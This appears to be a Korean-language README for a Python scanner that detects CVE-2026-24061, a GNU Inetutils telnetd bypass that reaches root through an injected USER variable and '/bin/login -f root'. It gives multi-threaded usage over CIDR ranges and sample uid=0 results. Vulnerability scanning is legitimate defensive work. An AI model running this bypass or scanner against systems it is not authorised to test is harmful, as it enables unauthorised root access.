
GNU Inetutils telnet 원격 인증 우회 취약점(CVE-2026-24061)으로, 이 취약점은 GNU Inetutils telnetd 구성 요소의 환경 변수 처리 부적절로 인해 발생합니다. 공격자는 이 취약점을 악용하여 악의적인 USER 환경 변수를 구성하고 영향을 받는 telnet 서비스로 전송함으로써 인증 우회 메커니즘을 트리거하고, 비밀번호 없이 직접 root 권한을 획득할 수 있습니다.
GNU Inetutils Telnetd 인증 우회 취약점(CVE-2026-24061)을 탐지하기 위한 고급 탐지 도구입니다. 해당 취약점의 CVSS 점수는 9.8로, 공격자는 환경 변수 주입을 통해 인증 없이 root 권한을 획득할 수 있습니다.
# Windows 시스템 색상 지원
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# 대상 파일 생성
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# 일괄 탐지 실행
python3 CVE-2026-24061.py -f targets.txt
# 포트 및 스레드 수 지정
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# 상세 모드 및 결과 저장
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# 사용자 정의 타임아웃 시간
python3 CVE-2026-24061.py -f targets.txt -T 10
| 상태 | 식별자 | 색상 | 설명 |
|---|---|---|---|
| 취약점 확인 | ✓ | 🔴 빨간색 | uid=0 및 gid=0 동시 탐지 |
| 고도로 의심됨 | ⚠ | 🟡 노란색 | uid=0 및 root 사용자 탐지 |
| 확인 필요 | ? | 🔵 청록색 | uid=0만 탐지, 수동 검증 필요 |
| 안전 | ✗ | 🟢 초록색 | 취약점 특성 미탐지 |
| 연결 실패 | ✗ | ⚪ 회색 | 네트워크 연결 문제 |
[✓ 취약점 확인] [14:30:25] 192.168.1.1:23 └─ 취약점 확인 | uid=0/gid=0 | 배너: Ubuntu 20.04
[⚠ 고도로 의심됨] [14:30:26] 192.168.1.2:23 └─ 고도로 의심됨 | uid=0 + root | 배너: Debian 12
[? 확인 필요] [14:30:27] 192.168.1.3:23 └─ uid=0 탐지되었으나 기타 확인 조건 부족
| 매개변수 | 약어 | 기본값 | 설명 |
|---|---|---|---|
--file | -f | - | 대상 파일 경로 |
--port | -p | 23 | 대상 포트 |
--threads | -t | 50 | 동시 스레드 수 |
--timeout | -T | 8 | 단일 대상 타임아웃 시간(초) |
--output | -o | - | 결과 출력 파일 |
--verbose | -v | False | 상세 출력 모드 |
--user | -u | root | 인증 사용자 이름 |
대상 파일은 다음 형식을 지원합니다: 192.168.1.1 192.168.1.2:2323 # 포트 지정 192.168.1.0/24 # CIDR 형식 10.0.0.1-10.0.0.10 # IP 범위
이 취약점은 GNU Inetutils Telnetd의 환경 변수 처리 결함을 이용합니다:
/bin/login -f root 명령 실행# 다중 탐지 조건
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# 취약점 확인 로직
if uid_0_detected and gid_0_detected:
return "취약점 확인"
elif uid_0_detected and root_detected:
return "고도로 의심됨"
elif uid_0_detected:
return "확인 필요"
·


